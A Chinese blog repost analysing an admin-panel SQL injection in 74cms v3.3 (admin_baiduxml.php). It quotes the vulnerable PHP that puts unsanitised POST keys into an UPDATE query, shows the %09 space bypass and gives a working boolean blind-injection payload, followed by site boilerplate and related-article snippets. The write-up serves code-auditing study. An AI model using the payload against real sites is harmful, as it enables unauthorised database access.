74cms v3.3 后台SQL注入

最新推荐文章于 2024-07-26 17:57:56 发布
最新推荐文章于 2024-07-26 17:57:56 发布
阅读量336 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/depycode/p/6699847.html
版权

注入存在于后台 admin_baiduxml.php

代码 52-63行

elseif($act == 'setsave')
{
        $_POST['xmlmax']=intval($_POST['xmlmax']);
        $_POST['xmlpagesize']=intval($_POST['xmlpagesize'])==0?1:intval($_POST['xmlpagesize']);
        foreach($_POST as $k => $v)
        {
        !$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";
        }
        refresh_cache('baiduxml');
        adminmsg("保存成功!",2);
}

这里可以看到 用了 foreach 对 $POST 进行遍历,没有对$k 进行处理

!$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";

虽然上面两行对 xmlmax 和 xmlpagesize进行了 intval操作,但是用户可以提交如下数据 那么这里b参数就没有进行任何处理导致注入

xmlmax=111&xmlpagesize=112&b=aaa

 

空格变为了_

可以用%09 代替 空格 

最后bool盲注 payload:

xmlmax=111&xmlpagesize=112&b'or%09if(1%3d(select%091%09REGEXP%09if(1%3d12,1,0x00)),1,1)%23=aaa

 

转载于:https://www.cnblogs.com/depycode/p/6699847.html

weixin_34101229
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[PHP代码审计]极致CMS1.6.7 SQL注入审计
xiaoguaiii的博客
08-18 1696
0x01前言 最近在学习php代码审计,刚好端午在家的时候菜的没事做,看了下cnvd,发现这个cmssql注入问题挺多的,hhh,复现玩玩。主要目标就是复现一下网站前端的sql注入。所有均为个人理解,可能有理解错误的地方,还请师傅们指正。
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
【某CMS漏洞分析】SQL注入漏洞分析
bdfcfff77fa的博客
03-07 502
这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值,
Subrion CMS存在SQL注入(CVE-2021-41947)
weixin_68999845的博客
07-21 1143
get=access&type=blocks后,是否紧跟恶意sql注入payload,若存在,则观察响应体result部分是否回显出敏感信息,若出现,则攻击成功。Subrion CMS v4.2.1版本在可视模式下存在SQL注入漏洞。(type、object和page参数后的value可为任意值type后的值跟单引号闭合),即可得到敏感信息。字符型注入,参数type用单引号标识,代码未对敏感关键字进行判断,只需单引号闭合即可绕过,从而获取敏感信息。type字段后的值跟单引号闭合,后用“-- -”闭合。
sql注入基础(web安全入门08)
黑战士的博客
01-23 1864
一、SQL 简介 SQL 结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986 年 10 月,美国国家标准学会对 SQL 进行规范后,以此作为关系式数据库管理系统的标准语 言。 MYSQL ACCESS MSSQL orcale 明显的层次结构 库名|表名|字段名|字段内容(像 excel 文件一样) 不过各种通行的数据库系统在其实践过程中都对 SQL 规范做了某些编改和扩充。所以实际 上不同的数据库系统之间的 SQL 不能完全通用。 SQL 注入(SQL Injection)是一
SQL注入
weixin_58954236的博客
08-27 176
vulhub靶场的使用:在官网中找路径,在kali中打开docker-compose.yml是docker镜像虚拟机的配置文件 ,开启靶场当开启靶场的时候会自动读取yml文件,启动虚拟机。浏览器访问虚拟机的IP和镜像的端口。poc(proof of concept):概念验证exp(exploit):漏洞利用工具有一些漏洞会和一些使用的工具之间存在端口冲突。
代码审计 => 74cms_v3.5.1.20141128 一系列漏洞
Berry2014的博客
06-07 536
0x01 前言   最近开始在学习代码审计了,以前几次学习代码审计都因为不知道如何下手,和代码的复杂就放弃了,这一次算是真正的认真学习,同时seay所编写的《代码审计 企业级Web代码安全架构》让我这个初学者能够入门。思路特别棒。我审的第一个CMS74cms_v3.5.1_20141128版本的,很早之前的了。H''Homaebic师傅教会了我很多思路。抱拳了老铁。 0x02 假...
【6】web安全入门篇-sql注入
weixin_43303273的博客
09-10 1731
0x01 sql介绍 通过对参数的污染,将恶意sql语句插入到数据库中执行的一种攻击方式。 0x02 sql注入原理 在进行数据库操作是,将sql语句与参数进行拼接,并放到数据库中执行。 如下面一段php代码 <?php /* ... */连接数据库操作省略 $username = $_GET['username']; $password = $_GET['password']; $sql ...
Jfinal CMS命令注入漏洞
MoLeft's Blog
12-21 1754
如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化。来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可。登录后台,找到模板管理,后台默认账号密码admin/admin123456。在 kali 上运行该工具,启动 rmi 和 ldap 服务。替换payload中的rmi或ldap地址,然后保存到。测试中使用的JDK版本:JDK8u101。jfinal_cms版本:5.0.1。类的构造方法中实例化。
SQL注入关联分析
swordheart的博客
04-25 1298
0x00 序言 打开亚马逊,当挑选一本《Android4高级编程》时,它会不失时机的列出你可能还会感兴趣的书籍,比如Android游戏开发、Cocos2d-x引擎等,让你的购物车又丰富了些,而钱包又空了些。关联分析,即从一个数据集中发现项之间的隐藏关系。 在Web攻防中,SQL注入绝对是一个技能的频繁项,为了技术的成熟化、自动化、智能化,我们有必要建立SQL注入与之相关典型技术之间的关联规则。在分析过程中,整个规则均围绕核心词进行直线展开,我们简单称之为“线性”关联。以知识点的复杂性我们虽然称不上为神经
YCCMS建站系统 v3.3
10-10
8. **安全考虑**:作为一款建站系统,YCCMS应考虑安全性问题,例如防止SQL注入、XSS攻击等,用户在使用时也需要关注安全设置,如定期更新系统、设置强壮的管理员密码等。 总的来说,YCCMS建站系统 v3.3以其轻量级的...
08CMS空白站群系统 v3.3 简体 UTF-8
05-10
10. **安全性**:08CMS会定期更新以修复已知安全漏洞,但用户仍需关注网络安全,例如防止SQL注入、XSS攻击和CSRF攻击等,以保护网站不受恶意攻击。 综上所述,08CMS空白站群系统 v3.3 简体 UTF-8 提供了一套全面的...
宗师堂CMS V3.3自媒体投稿软文自助交易平台源码 PC端+移动端+微信端多线运营
08-09
源码应包含必要的安全措施,如防止SQL注入、XSS攻击等,同时优化性能,以应对高并发访问。 7. **用户界面与交互设计** 良好的用户体验是平台成功的关键。宗师堂CMS V3.3在设计上应注重用户界面的简洁明了,以及...
骑士人才系统74cms升级到最新4.2.131商业版
12-05
- 安全性增强:可能包括对SQL注入、XSS攻击等的防御提升,以及后台登录安全性的强化。 - 性能提升:可能包括数据库查询优化、页面加载速度提升等,以减少响应时间,提升用户体验。 - 用户界面优化:可能更新了...
PHP商城案例
最新发布
王世凡的技术博客
07-26 297
http://www.e9933.com/
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 858
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 655
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1050
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
cmsv6 sql注入漏洞
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、修改或删除数据库中的数据。 CMSv6的SQL注入漏洞可能导致以下风险: 1. 数据泄露:攻击者可以通过注入恶意的SQL代码来获取数据库中的敏感信息,如用户账号、密码等。 2. 数据篡改:攻击者可以修改数据库中的数据,包括修改用户信息、文章内容等。 3. 数据删除:攻击者可以通过注入删除语句删除数据库中的数据,导致数据的不可恢复性损失。 为了防止SQL注入漏洞,开发者应该采取以下措施: 1. 使用参数化查询或预编译语句来处理用户输入,确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询,避免直接拼接用户输入到查询语句中,而是使用参数化查询。 3. 限制数据库用户的权限,确保数据库用户只能执行必要的操作,并且不允许直接执行危险的SQL语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值